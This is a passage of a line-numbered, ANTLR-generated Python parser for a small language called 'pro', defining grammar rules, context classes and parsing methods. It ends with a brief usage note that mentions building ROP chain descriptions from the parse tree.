buf.write(u"\2\2\2\f)\618?OQXdj~") 50 | return buf.getvalue() 51 | 52 | 53 | class proParser ( Parser ): 54 | 55 | grammarFileName = "pro.g4" 56 | 57 | atn = ATNDeserializer().deserialize(serializedATN()) 58 | 59 | decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ] 60 | 61 | sharedContextCache = PredictionContextCache() 62 | 63 | literalNames = [ u"", u"'{'", u"'}'", u"';'", u"'\n'", u"'var'", 64 | u"'const'", u"'array'", u"'func'", u"'('", u"')'", 65 | u"'['", u"']'", u"'<'", u"','", u"'>'", u"'+'", u"'-'", 66 | u"'*'", u"'/'", u"'^'", u"'|'", u"'&'" ] 67 | 68 | symbolicNames = [ u"", u"", u"", u"", 69 | u"", u"", u"", u"", 70 | u"", u"", u"", u"", 71 | u"", u"", u"", u"", 72 | u"", u"", u"", u"", 73 | u"", u"", u"", u"Identifier", 74 | u"Constant", u"Decimal", u"Hexadecimal", u"String", 75 | u"Whitespace", u"LineComment", u"BlockComment" ] 76 | 77 | RULE_program = 0 78 | RULE_statement = 1 79 | RULE_delimiter = 2 80 | RULE_declaration = 3 81 | RULE_type_specifier = 4 82 | RULE_initializer = 5 83 | RULE_expression_initializer = 6 84 | RULE_array_initializer = 7 85 | RULE_func_initializer = 8 86 | RULE_call_statement = 9 87 | RULE_arguments = 10 88 | RULE_expression = 11 89 | RULE_binary_expression = 12 90 | RULE_unary_expression = 13 91 | RULE_binary_operator = 14 92 | RULE_unary_operator = 15 93 | RULE_primary_expression = 16 94 | 95 | ruleNames = [ u"program", u"statement", u"delimiter", u"declaration", 96 | u"type_specifier", u"initializer", u"expression_initializer", 97 | u"array_initializer", u"func_initializer", u"call_statement", 98 | u"arguments", u"expression", u"binary_expression", u"unary_expression", 99 | u"binary_operator", u"unary_operator", u"primary_expression" ] 100 | 101 | EOF = Token.EOF 102 | T__0=1 103 | T__1=2 104 | T__2=3 105 | T__3=4 106 | T__4=5 107 | T__5=6 108 | T__6=7 109 | T__7=8 110 | T__8=9 111 | T__9=10 112 | T__10=11 113 | T__11=12 114 | T__12=13 115 | T__13=14 116 | T__14=15 117 | T__15=16 118 | T__16=17 119 | T__17=18 120 | T__18=19 121 | T__19=20 122 | T__20=21 123 | T__21=22 124 | Identifier=23 125 | Constant=24 126 | Decimal=25 127 | Hexadecimal=26 128 | String=27 129 | Whitespace=28 130 | LineComment=29 131 | BlockComment=30 132 | 133 | def __init__(self, input): 134 | super(proParser, self).__init__(input) 135 | self.checkVersion("4.5.2") 136 | self._interp = ParserATNSimulator(self, 
self.atn, self.decisionsToDFA, self.sharedContextCache) 137 | self._predicates = None 138 | 139 | 140 | 141 | class ProgramContext(ParserRuleContext): 142 | 143 | def __init__(self, parser, parent=None, invokingState=-1): 144 | super(proParser.ProgramContext, self).__init__(parent, invokingState) 145 | self.parser = parser 146 | 147 | def Identifier(self): 148 | return self.getToken(proParser.Identifier, 0) 149 | 150 | def statement(self, i=None): 151 | if i is None: 152 | return self.getTypedRuleContexts(proParser.StatementContext) 153 | else: 154 | return self.getTypedRuleContext(proParser.StatementContext,i) 155 | 156 | 157 | def getRuleIndex(self): 158 | return proParser.RULE_program 159 | 160 | def accept(self, visitor): 161 | if hasattr(visitor, "visitProgram"): 162 | return visitor.visitProgram(self) 163 | else: 164 | return visitor.visitChildren(self) 165 | 166 | 167 | 168 | 169 | def program(self): 170 | 171 | localctx = proParser.ProgramContext(self, self._ctx, self.state) 172 | self.enterRule(localctx, 0, self.RULE_program) 173 | self._la = 0 # Token type 174 | try: 175 | self.enterOuterAlt(localctx, 1) 176 | self.state = 34 177 | self.match(proParser.Identifier) 178 | self.state = 35 179 | self.match(proParser.T__0) 180 | self.state = 39 181 | self._errHandler.sync(self) 182 | _la = self._input.LA(1) 183 | while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__2) | (1 << proParser.T__3) | (1 << proParser.T__4) | (1 << proParser.T__5) | (1 << proParser.T__6) | (1 << proParser.T__7) | (1 << proParser.Identifier))) != 0): 184 | self.state = 36 185 | self.statement() 186 | self.state = 41 187 | self._errHandler.sync(self) 188 | _la = self._input.LA(1) 189 | 190 | self.state = 42 191 | self.match(proParser.T__1) 192 | except RecognitionException as re: 193 | localctx.exception = re 194 | self._errHandler.reportError(self, re) 195 | self._errHandler.recover(self, re) 196 | finally: 197 | self.exitRule() 198 | return localctx 199 | 200 | class StatementContext(ParserRuleContext): 201 | 202 | def __init__(self, parser, parent=None, invokingState=-1): 203 | super(proParser.StatementContext, self).__init__(parent, invokingState) 204 | self.parser = parser 205 | 206 | def call_statement(self): 207 | return self.getTypedRuleContext(proParser.Call_statementContext,0) 208 | 209 | 210 | def declaration(self): 211 | return self.getTypedRuleContext(proParser.DeclarationContext,0) 212 | 213 | 214 | def delimiter(self): 215 | return self.getTypedRuleContext(proParser.DelimiterContext,0) 216 | 217 | 218 | def getRuleIndex(self): 219 | return proParser.RULE_statement 220 | 221 | def accept(self, visitor): 222 | if hasattr(visitor, "visitStatement"): 223 | return visitor.visitStatement(self) 224 | else: 225 | return visitor.visitChildren(self) 226 | 227 | 228 | 229 | 230 | def statement(self): 231 | 232 | localctx = proParser.StatementContext(self, self._ctx, self.state) 233 | self.enterRule(localctx, 2, self.RULE_statement) 234 | try: 235 | self.state = 47 236 | token = self._input.LA(1) 237 | if token in [proParser.Identifier]: 238 | self.enterOuterAlt(localctx, 1) 239 | self.state = 44 240 | self.call_statement() 241 | 242 | elif token in [proParser.T__4, proParser.T__5, proParser.T__6, proParser.T__7]: 243 | self.enterOuterAlt(localctx, 2) 244 | self.state = 45 245 | self.declaration() 246 | 247 | elif token in [proParser.T__2, proParser.T__3]: 248 | self.enterOuterAlt(localctx, 3) 249 | self.state = 46 250 | self.delimiter() 251 | 252 | else: 253 | raise NoViableAltException(self) 
254 | 255 | except RecognitionException as re: 256 | localctx.exception = re 257 | self._errHandler.reportError(self, re) 258 | self._errHandler.recover(self, re) 259 | finally: 260 | self.exitRule() 261 | return localctx 262 | 263 | class DelimiterContext(ParserRuleContext): 264 | 265 | def __init__(self, parser, parent=None, invokingState=-1): 266 | super(proParser.DelimiterContext, self).__init__(parent, invokingState) 267 | self.parser = parser 268 | 269 | 270 | def getRuleIndex(self): 271 | return proParser.RULE_delimiter 272 | 273 | def accept(self, visitor): 274 | if hasattr(visitor, "visitDelimiter"): 275 | return visitor.visitDelimiter(self) 276 | else: 277 | return visitor.visitChildren(self) 278 | 279 | 280 | 281 | 282 | def delimiter(self): 283 | 284 | localctx = proParser.DelimiterContext(self, self._ctx, self.state) 285 | self.enterRule(localctx, 4, self.RULE_delimiter) 286 | self._la = 0 # Token type 287 | try: 288 | self.enterOuterAlt(localctx, 1) 289 | self.state = 49 290 | _la = self._input.LA(1) 291 | if not(_la==proParser.T__2 or _la==proParser.T__3): 292 | self._errHandler.recoverInline(self) 293 | else: 294 | self.consume() 295 | except RecognitionException as re: 296 | localctx.exception = re 297 | self._errHandler.reportError(self, re) 298 | self._errHandler.recover(self, re) 299 | finally: 300 | self.exitRule() 301 | return localctx 302 | 303 | class DeclarationContext(ParserRuleContext): 304 | 305 | def __init__(self, parser, parent=None, invokingState=-1): 306 | super(proParser.DeclarationContext, self).__init__(parent, invokingState) 307 | self.parser = parser 308 | 309 | def type_specifier(self): 310 | return self.getTypedRuleContext(proParser.Type_specifierContext,0) 311 | 312 | 313 | def Identifier(self): 314 | return self.getToken(proParser.Identifier, 0) 315 | 316 | def initializer(self): 317 | return self.getTypedRuleContext(proParser.InitializerContext,0) 318 | 319 | 320 | def getRuleIndex(self): 321 | return proParser.RULE_declaration 322 | 323 | def accept(self, visitor): 324 | if hasattr(visitor, "visitDeclaration"): 325 | return visitor.visitDeclaration(self) 326 | else: 327 | return visitor.visitChildren(self) 328 | 329 | 330 | 331 | 332 | def declaration(self): 333 | 334 | localctx = proParser.DeclarationContext(self, self._ctx, self.state) 335 | self.enterRule(localctx, 6, self.RULE_declaration) 336 | self._la = 0 # Token type 337 | try: 338 | self.enterOuterAlt(localctx, 1) 339 | self.state = 51 340 | self.type_specifier() 341 | self.state = 52 342 | self.match(proParser.Identifier) 343 | self.state = 54 344 | _la = self._input.LA(1) 345 | if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__8) | (1 << proParser.T__10) | (1 << proParser.T__12))) != 0): 346 | self.state = 53 347 | self.initializer() 348 | 349 | 350 | except RecognitionException as re: 351 | localctx.exception = re 352 | self._errHandler.reportError(self, re) 353 | self._errHandler.recover(self, re) 354 | finally: 355 | self.exitRule() 356 | return localctx 357 | 358 | class Type_specifierContext(ParserRuleContext): 359 | 360 | def __init__(self, parser, parent=None, invokingState=-1): 361 | super(proParser.Type_specifierContext, self).__init__(parent, invokingState) 362 | self.parser = parser 363 | 364 | 365 | def getRuleIndex(self): 366 | return proParser.RULE_type_specifier 367 | 368 | def accept(self, visitor): 369 | if hasattr(visitor, "visitType_specifier"): 370 | return visitor.visitType_specifier(self) 371 | else: 372 | return visitor.visitChildren(self) 373 | 374 
| 375 | 376 | 377 | def type_specifier(self): 378 | 379 | localctx = proParser.Type_specifierContext(self, self._ctx, self.state) 380 | self.enterRule(localctx, 8, self.RULE_type_specifier) 381 | self._la = 0 # Token type 382 | try: 383 | self.enterOuterAlt(localctx, 1) 384 | self.state = 56 385 | _la = self._input.LA(1) 386 | if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__4) | (1 << proParser.T__5) | (1 << proParser.T__6) | (1 << proParser.T__7))) != 0)): 387 | self._errHandler.recoverInline(self) 388 | else: 389 | self.consume() 390 | except RecognitionException as re: 391 | localctx.exception = re 392 | self._errHandler.reportError(self, re) 393 | self._errHandler.recover(self, re) 394 | finally: 395 | self.exitRule() 396 | return localctx 397 | 398 | class InitializerContext(ParserRuleContext): 399 | 400 | def __init__(self, parser, parent=None, invokingState=-1): 401 | super(proParser.InitializerContext, self).__init__(parent, invokingState) 402 | self.parser = parser 403 | 404 | def expression_initializer(self): 405 | return self.getTypedRuleContext(proParser.Expression_initializerContext,0) 406 | 407 | 408 | def array_initializer(self): 409 | return self.getTypedRuleContext(proParser.Array_initializerContext,0) 410 | 411 | 412 | def func_initializer(self): 413 | return self.getTypedRuleContext(proParser.Func_initializerContext,0) 414 | 415 | 416 | def getRuleIndex(self): 417 | return proParser.RULE_initializer 418 | 419 | def accept(self, visitor): 420 | if hasattr(visitor, "visitInitializer"): 421 | return visitor.visitInitializer(self) 422 | else: 423 | return visitor.visitChildren(self) 424 | 425 | 426 | 427 | 428 | def initializer(self): 429 | 430 | localctx = proParser.InitializerContext(self, self._ctx, self.state) 431 | self.enterRule(localctx, 10, self.RULE_initializer) 432 | try: 433 | self.state = 61 434 | token = self._input.LA(1) 435 | if token in [proParser.T__8]: 436 | self.enterOuterAlt(localctx, 1) 437 | self.state = 58 438 | self.expression_initializer() 439 | 440 | elif token in [proParser.T__10]: 441 | self.enterOuterAlt(localctx, 2) 442 | self.state = 59 443 | self.array_initializer() 444 | 445 | elif token in [proParser.T__12]: 446 | self.enterOuterAlt(localctx, 3) 447 | self.state = 60 448 | self.func_initializer() 449 | 450 | else: 451 | raise NoViableAltException(self) 452 | 453 | except RecognitionException as re: 454 | localctx.exception = re 455 | self._errHandler.reportError(self, re) 456 | self._errHandler.recover(self, re) 457 | finally: 458 | self.exitRule() 459 | return localctx 460 | 461 | class Expression_initializerContext(ParserRuleContext): 462 | 463 | def __init__(self, parser, parent=None, invokingState=-1): 464 | super(proParser.Expression_initializerContext, self).__init__(parent, invokingState) 465 | self.parser = parser 466 | 467 | def expression(self): 468 | return self.getTypedRuleContext(proParser.ExpressionContext,0) 469 | 470 | 471 | def getRuleIndex(self): 472 | return proParser.RULE_expression_initializer 473 | 474 | def accept(self, visitor): 475 | if hasattr(visitor, "visitExpression_initializer"): 476 | return visitor.visitExpression_initializer(self) 477 | else: 478 | return visitor.visitChildren(self) 479 | 480 | 481 | 482 | 483 | def expression_initializer(self): 484 | 485 | localctx = proParser.Expression_initializerContext(self, self._ctx, self.state) 486 | self.enterRule(localctx, 12, self.RULE_expression_initializer) 487 | try: 488 | self.enterOuterAlt(localctx, 1) 489 | self.state = 63 490 | 
self.match(proParser.T__8) 491 | self.state = 64 492 | self.expression() 493 | self.state = 65 494 | self.match(proParser.T__9) 495 | except RecognitionException as re: 496 | localctx.exception = re 497 | self._errHandler.reportError(self, re) 498 | self._errHandler.recover(self, re) 499 | finally: 500 | self.exitRule() 501 | return localctx 502 | 503 | class Array_initializerContext(ParserRuleContext): 504 | 505 | def __init__(self, parser, parent=None, invokingState=-1): 506 | super(proParser.Array_initializerContext, self).__init__(parent, invokingState) 507 | self.parser = parser 508 | 509 | def expression(self): 510 | return self.getTypedRuleContext(proParser.ExpressionContext,0) 511 | 512 | 513 | def getRuleIndex(self): 514 | return proParser.RULE_array_initializer 515 | 516 | def accept(self, visitor): 517 | if hasattr(visitor, "visitArray_initializer"): 518 | return visitor.visitArray_initializer(self) 519 | else: 520 | return visitor.visitChildren(self) 521 | 522 | 523 | 524 | 525 | def array_initializer(self): 526 | 527 | localctx = proParser.Array_initializerContext(self, self._ctx, self.state) 528 | self.enterRule(localctx, 14, self.RULE_array_initializer) 529 | try: 530 | self.enterOuterAlt(localctx, 1) 531 | self.state = 67 532 | self.match(proParser.T__10) 533 | self.state = 68 534 | self.expression() 535 | self.state = 69 536 | self.match(proParser.T__11) 537 | except RecognitionException as re: 538 | localctx.exception = re 539 | self._errHandler.reportError(self, re) 540 | self._errHandler.recover(self, re) 541 | finally: 542 | self.exitRule() 543 | return localctx 544 | 545 | class Func_initializerContext(ParserRuleContext): 546 | 547 | def __init__(self, parser, parent=None, invokingState=-1): 548 | super(proParser.Func_initializerContext, self).__init__(parent, invokingState) 549 | self.parser = parser 550 | 551 | def Identifier(self): 552 | return self.getToken(proParser.Identifier, 0) 553 | 554 | def Constant(self): 555 | return self.getToken(proParser.Constant, 0) 556 | 557 | def String(self): 558 | return self.getToken(proParser.String, 0) 559 | 560 | def getRuleIndex(self): 561 | return proParser.RULE_func_initializer 562 | 563 | def accept(self, visitor): 564 | if hasattr(visitor, "visitFunc_initializer"): 565 | return visitor.visitFunc_initializer(self) 566 | else: 567 | return visitor.visitChildren(self) 568 | 569 | 570 | 571 | 572 | def func_initializer(self): 573 | 574 | localctx = proParser.Func_initializerContext(self, self._ctx, self.state) 575 | self.enterRule(localctx, 16, self.RULE_func_initializer) 576 | self._la = 0 # Token type 577 | try: 578 | self.enterOuterAlt(localctx, 1) 579 | self.state = 71 580 | self.match(proParser.T__12) 581 | self.state = 72 582 | self.match(proParser.Identifier) 583 | self.state = 79 584 | _la = self._input.LA(1) 585 | if _la==proParser.T__13: 586 | self.state = 73 587 | self.match(proParser.T__13) 588 | self.state = 74 589 | self.match(proParser.Constant) 590 | self.state = 77 591 | _la = self._input.LA(1) 592 | if _la==proParser.T__13: 593 | self.state = 75 594 | self.match(proParser.T__13) 595 | self.state = 76 596 | self.match(proParser.String) 597 | 598 | 599 | 600 | 601 | self.state = 81 602 | self.match(proParser.T__14) 603 | except RecognitionException as re: 604 | localctx.exception = re 605 | self._errHandler.reportError(self, re) 606 | self._errHandler.recover(self, re) 607 | finally: 608 | self.exitRule() 609 | return localctx 610 | 611 | class Call_statementContext(ParserRuleContext): 612 | 613 | def 
__init__(self, parser, parent=None, invokingState=-1): 614 | super(proParser.Call_statementContext, self).__init__(parent, invokingState) 615 | self.parser = parser 616 | 617 | def Identifier(self): 618 | return self.getToken(proParser.Identifier, 0) 619 | 620 | def arguments(self): 621 | return self.getTypedRuleContext(proParser.ArgumentsContext,0) 622 | 623 | 624 | def getRuleIndex(self): 625 | return proParser.RULE_call_statement 626 | 627 | def accept(self, visitor): 628 | if hasattr(visitor, "visitCall_statement"): 629 | return visitor.visitCall_statement(self) 630 | else: 631 | return visitor.visitChildren(self) 632 | 633 | 634 | 635 | 636 | def call_statement(self): 637 | 638 | localctx = proParser.Call_statementContext(self, self._ctx, self.state) 639 | self.enterRule(localctx, 18, self.RULE_call_statement) 640 | self._la = 0 # Token type 641 | try: 642 | self.enterOuterAlt(localctx, 1) 643 | self.state = 83 644 | self.match(proParser.Identifier) 645 | self.state = 84 646 | self.match(proParser.T__8) 647 | self.state = 86 648 | _la = self._input.LA(1) 649 | if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__8) | (1 << proParser.T__21) | (1 << proParser.Identifier) | (1 << proParser.Constant) | (1 << proParser.String))) != 0): 650 | self.state = 85 651 | self.arguments(0) 652 | 653 | 654 | self.state = 88 655 | self.match(proParser.T__9) 656 | except RecognitionException as re: 657 | localctx.exception = re 658 | self._errHandler.reportError(self, re) 659 | self._errHandler.recover(self, re) 660 | finally: 661 | self.exitRule() 662 | return localctx 663 | 664 | class ArgumentsContext(ParserRuleContext): 665 | 666 | def __init__(self, parser, parent=None, invokingState=-1): 667 | super(proParser.ArgumentsContext, self).__init__(parent, invokingState) 668 | self.parser = parser 669 | 670 | def expression(self): 671 | return self.getTypedRuleContext(proParser.ExpressionContext,0) 672 | 673 | 674 | def arguments(self): 675 | return self.getTypedRuleContext(proParser.ArgumentsContext,0) 676 | 677 | 678 | def getRuleIndex(self): 679 | return proParser.RULE_arguments 680 | 681 | def accept(self, visitor): 682 | if hasattr(visitor, "visitArguments"): 683 | return visitor.visitArguments(self) 684 | else: 685 | return visitor.visitChildren(self) 686 | 687 | 688 | 689 | def arguments(self, _p=0): 690 | _parentctx = self._ctx 691 | _parentState = self.state 692 | localctx = proParser.ArgumentsContext(self, self._ctx, _parentState) 693 | _prevctx = localctx 694 | _startState = 20 695 | self.enterRecursionRule(localctx, 20, self.RULE_arguments, _p) 696 | try: 697 | self.enterOuterAlt(localctx, 1) 698 | self.state = 91 699 | self.expression() 700 | self._ctx.stop = self._input.LT(-1) 701 | self.state = 98 702 | self._errHandler.sync(self) 703 | _alt = self._interp.adaptivePredict(self._input,7,self._ctx) 704 | while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER: 705 | if _alt==1: 706 | if self._parseListeners is not None: 707 | self.triggerExitRuleEvent() 708 | _prevctx = localctx 709 | localctx = proParser.ArgumentsContext(self, _parentctx, _parentState) 710 | self.pushNewRecursionContext(localctx, _startState, self.RULE_arguments) 711 | self.state = 93 712 | if not self.precpred(self._ctx, 1): 713 | from antlr4.error.Errors import FailedPredicateException 714 | raise FailedPredicateException(self, "self.precpred(self._ctx, 1)") 715 | self.state = 94 716 | self.match(proParser.T__13) 717 | self.state = 95 718 | self.expression() 719 | self.state = 100 720 | self._errHandler.sync(self) 721 
| _alt = self._interp.adaptivePredict(self._input,7,self._ctx) 722 | 723 | except RecognitionException as re: 724 | localctx.exception = re 725 | self._errHandler.reportError(self, re) 726 | self._errHandler.recover(self, re) 727 | finally: 728 | self.unrollRecursionContexts(_parentctx) 729 | return localctx 730 | 731 | class ExpressionContext(ParserRuleContext): 732 | 733 | def __init__(self, parser, parent=None, invokingState=-1): 734 | super(proParser.ExpressionContext, self).__init__(parent, invokingState) 735 | self.parser = parser 736 | 737 | def primary_expression(self): 738 | return self.getTypedRuleContext(proParser.Primary_expressionContext,0) 739 | 740 | 741 | def binary_expression(self): 742 | return self.getTypedRuleContext(proParser.Binary_expressionContext,0) 743 | 744 | 745 | def unary_expression(self): 746 | return self.getTypedRuleContext(proParser.Unary_expressionContext,0) 747 | 748 | 749 | def getRuleIndex(self): 750 | return proParser.RULE_expression 751 | 752 | def accept(self, visitor): 753 | if hasattr(visitor, "visitExpression"): 754 | return visitor.visitExpression(self) 755 | else: 756 | return visitor.visitChildren(self) 757 | 758 | 759 | 760 | 761 | def expression(self): 762 | 763 | localctx = proParser.ExpressionContext(self, self._ctx, self.state) 764 | self.enterRule(localctx, 22, self.RULE_expression) 765 | try: 766 | self.state = 104 767 | self._errHandler.sync(self); 768 | la_ = self._interp.adaptivePredict(self._input,8,self._ctx) 769 | if la_ == 1: 770 | self.enterOuterAlt(localctx, 1) 771 | self.state = 101 772 | self.primary_expression() 773 | pass 774 | 775 | elif la_ == 2: 776 | self.enterOuterAlt(localctx, 2) 777 | self.state = 102 778 | self.binary_expression() 779 | pass 780 | 781 | elif la_ == 3: 782 | self.enterOuterAlt(localctx, 3) 783 | self.state = 103 784 | self.unary_expression() 785 | pass 786 | 787 | 788 | except RecognitionException as re: 789 | localctx.exception = re 790 | self._errHandler.reportError(self, re) 791 | self._errHandler.recover(self, re) 792 | finally: 793 | self.exitRule() 794 | return localctx 795 | 796 | class Binary_expressionContext(ParserRuleContext): 797 | 798 | def __init__(self, parser, parent=None, invokingState=-1): 799 | super(proParser.Binary_expressionContext, self).__init__(parent, invokingState) 800 | self.parser = parser 801 | 802 | def primary_expression(self, i=None): 803 | if i is None: 804 | return self.getTypedRuleContexts(proParser.Primary_expressionContext) 805 | else: 806 | return self.getTypedRuleContext(proParser.Primary_expressionContext,i) 807 | 808 | 809 | def binary_operator(self): 810 | return self.getTypedRuleContext(proParser.Binary_operatorContext,0) 811 | 812 | 813 | def getRuleIndex(self): 814 | return proParser.RULE_binary_expression 815 | 816 | def accept(self, visitor): 817 | if hasattr(visitor, "visitBinary_expression"): 818 | return visitor.visitBinary_expression(self) 819 | else: 820 | return visitor.visitChildren(self) 821 | 822 | 823 | 824 | 825 | def binary_expression(self): 826 | 827 | localctx = proParser.Binary_expressionContext(self, self._ctx, self.state) 828 | self.enterRule(localctx, 24, self.RULE_binary_expression) 829 | try: 830 | self.enterOuterAlt(localctx, 1) 831 | self.state = 106 832 | self.primary_expression() 833 | self.state = 107 834 | self.binary_operator() 835 | self.state = 108 836 | self.primary_expression() 837 | except RecognitionException as re: 838 | localctx.exception = re 839 | self._errHandler.reportError(self, re) 840 | 
self._errHandler.recover(self, re) 841 | finally: 842 | self.exitRule() 843 | return localctx 844 | 845 | class Unary_expressionContext(ParserRuleContext): 846 | 847 | def __init__(self, parser, parent=None, invokingState=-1): 848 | super(proParser.Unary_expressionContext, self).__init__(parent, invokingState) 849 | self.parser = parser 850 | 851 | def unary_operator(self): 852 | return self.getTypedRuleContext(proParser.Unary_operatorContext,0) 853 | 854 | 855 | def primary_expression(self): 856 | return self.getTypedRuleContext(proParser.Primary_expressionContext,0) 857 | 858 | 859 | def getRuleIndex(self): 860 | return proParser.RULE_unary_expression 861 | 862 | def accept(self, visitor): 863 | if hasattr(visitor, "visitUnary_expression"): 864 | return visitor.visitUnary_expression(self) 865 | else: 866 | return visitor.visitChildren(self) 867 | 868 | 869 | 870 | 871 | def unary_expression(self): 872 | 873 | localctx = proParser.Unary_expressionContext(self, self._ctx, self.state) 874 | self.enterRule(localctx, 26, self.RULE_unary_expression) 875 | try: 876 | self.enterOuterAlt(localctx, 1) 877 | self.state = 110 878 | self.unary_operator() 879 | self.state = 111 880 | self.primary_expression() 881 | except RecognitionException as re: 882 | localctx.exception = re 883 | self._errHandler.reportError(self, re) 884 | self._errHandler.recover(self, re) 885 | finally: 886 | self.exitRule() 887 | return localctx 888 | 889 | class Binary_operatorContext(ParserRuleContext): 890 | 891 | def __init__(self, parser, parent=None, invokingState=-1): 892 | super(proParser.Binary_operatorContext, self).__init__(parent, invokingState) 893 | self.parser = parser 894 | 895 | 896 | def getRuleIndex(self): 897 | return proParser.RULE_binary_operator 898 | 899 | def accept(self, visitor): 900 | if hasattr(visitor, "visitBinary_operator"): 901 | return visitor.visitBinary_operator(self) 902 | else: 903 | return visitor.visitChildren(self) 904 | 905 | 906 | 907 | 908 | def binary_operator(self): 909 | 910 | localctx = proParser.Binary_operatorContext(self, self._ctx, self.state) 911 | self.enterRule(localctx, 28, self.RULE_binary_operator) 912 | self._la = 0 # Token type 913 | try: 914 | self.enterOuterAlt(localctx, 1) 915 | self.state = 113 916 | _la = self._input.LA(1) 917 | if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << proParser.T__15) | (1 << proParser.T__16) | (1 << proParser.T__17) | (1 << proParser.T__18) | (1 << proParser.T__19) | (1 << proParser.T__20) | (1 << proParser.T__21))) != 0)): 918 | self._errHandler.recoverInline(self) 919 | else: 920 | self.consume() 921 | except RecognitionException as re: 922 | localctx.exception = re 923 | self._errHandler.reportError(self, re) 924 | self._errHandler.recover(self, re) 925 | finally: 926 | self.exitRule() 927 | return localctx 928 | 929 | class Unary_operatorContext(ParserRuleContext): 930 | 931 | def __init__(self, parser, parent=None, invokingState=-1): 932 | super(proParser.Unary_operatorContext, self).__init__(parent, invokingState) 933 | self.parser = parser 934 | 935 | 936 | def getRuleIndex(self): 937 | return proParser.RULE_unary_operator 938 | 939 | def accept(self, visitor): 940 | if hasattr(visitor, "visitUnary_operator"): 941 | return visitor.visitUnary_operator(self) 942 | else: 943 | return visitor.visitChildren(self) 944 | 945 | 946 | 947 | 948 | def unary_operator(self): 949 | 950 | localctx = proParser.Unary_operatorContext(self, self._ctx, self.state) 951 | self.enterRule(localctx, 30, self.RULE_unary_operator) 952 | try: 953 | 
self.enterOuterAlt(localctx, 1) 954 | self.state = 115 955 | self.match(proParser.T__21) 956 | except RecognitionException as re: 957 | localctx.exception = re 958 | self._errHandler.reportError(self, re) 959 | self._errHandler.recover(self, re) 960 | finally: 961 | self.exitRule() 962 | return localctx 963 | 964 | class Primary_expressionContext(ParserRuleContext): 965 | 966 | def __init__(self, parser, parent=None, invokingState=-1): 967 | super(proParser.Primary_expressionContext, self).__init__(parent, invokingState) 968 | self.parser = parser 969 | 970 | def Identifier(self): 971 | return self.getToken(proParser.Identifier, 0) 972 | 973 | def Constant(self): 974 | return self.getToken(proParser.Constant, 0) 975 | 976 | def String(self): 977 | return self.getToken(proParser.String, 0) 978 | 979 | def expression(self): 980 | return self.getTypedRuleContext(proParser.ExpressionContext,0) 981 | 982 | 983 | def getRuleIndex(self): 984 | return proParser.RULE_primary_expression 985 | 986 | def accept(self, visitor): 987 | if hasattr(visitor, "visitPrimary_expression"): 988 | return visitor.visitPrimary_expression(self) 989 | else: 990 | return visitor.visitChildren(self) 991 | 992 | 993 | 994 | 995 | def primary_expression(self): 996 | 997 | localctx = proParser.Primary_expressionContext(self, self._ctx, self.state) 998 | self.enterRule(localctx, 32, self.RULE_primary_expression) 999 | try: 1000 | self.state = 124 1001 | token = self._input.LA(1) 1002 | if token in [proParser.Identifier]: 1003 | self.enterOuterAlt(localctx, 1) 1004 | self.state = 117 1005 | self.match(proParser.Identifier) 1006 | 1007 | elif token in [proParser.Constant]: 1008 | self.enterOuterAlt(localctx, 2) 1009 | self.state = 118 1010 | self.match(proParser.Constant) 1011 | 1012 | elif token in [proParser.String]: 1013 | self.enterOuterAlt(localctx, 3) 1014 | self.state = 119 1015 | self.match(proParser.String) 1016 | 1017 | elif token in [proParser.T__8]: 1018 | self.enterOuterAlt(localctx, 4) 1019 | self.state = 120 1020 | self.match(proParser.T__8) 1021 | self.state = 121 1022 | self.expression() 1023 | self.state = 122 1024 | self.match(proParser.T__9) 1025 | 1026 | else: 1027 | raise NoViableAltException(self) 1028 | 1029 | except RecognitionException as re: 1030 | localctx.exception = re 1031 | self._errHandler.reportError(self, re) 1032 | self._errHandler.recover(self, re) 1033 | finally: 1034 | self.exitRule() 1035 | return localctx 1036 | 1037 | 1038 | 1039 | def sempred(self, localctx, ruleIndex, predIndex): 1040 | if self._predicates == None: 1041 | self._predicates = dict() 1042 | self._predicates[10] = self.arguments_sempred 1043 | pred = self._predicates.get(ruleIndex, None) 1044 | if pred is None: 1045 | raise Exception("No predicate with index:" + str(ruleIndex)) 1046 | else: 1047 | return pred(localctx, predIndex) 1048 | 1049 | def arguments_sempred(self, localctx, predIndex): 1050 | if predIndex == 0: 1051 | return self.precpred(self._ctx, 1) 1052 | 1053 | 1054 | 1055 | 1056 | 1057 | --------------------------------------------------------------------------------
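The parser above is ANTLR-generated from pro.g4 and is normally driven through the ANTLR4 Python runtime rather than edited by hand. Below is a minimal, illustrative sketch of that wiring, assuming the stock antlr4 runtime API (InputStream, CommonTokenStream) and a hypothetical one-line .pro program modeled on the bundled examples; the repository's actual glue code in pro/parse and pro/codegen.py may differ.

```python
# Illustrative sketch, not part of the repository: drive the generated
# proLexer/proParser/proVisitor with the standard ANTLR4 Python runtime.
from antlr4 import InputStream, CommonTokenStream

from pro.parse.proLexer import proLexer
from pro.parse.proParser import proParser
from pro.parse.proVisitor import proVisitor

# Hypothetical minimal .pro program (syntax modeled on the example scripts).
source = u'main { printf("hi"); exit(0); }'

lexer = proLexer(InputStream(source))   # tokenize the .pro source
tokens = CommonTokenStream(lexer)
parser = proParser(tokens)              # the class defined in this file
tree = parser.program()                 # 'program' is the start rule (RULE_program = 0)

# The generated visitor only walks children by default; a real pass would
# override visitProgram, visitDeclaration, visitCall_statement, and so on.
proVisitor().visit(tree)
```

A custom subclass of proVisitor overriding the visit methods listed in this file (visitProgram, visitCall_statement, visitExpression, ...) is the usual way to turn the parse tree into something useful, such as a ROP chain description.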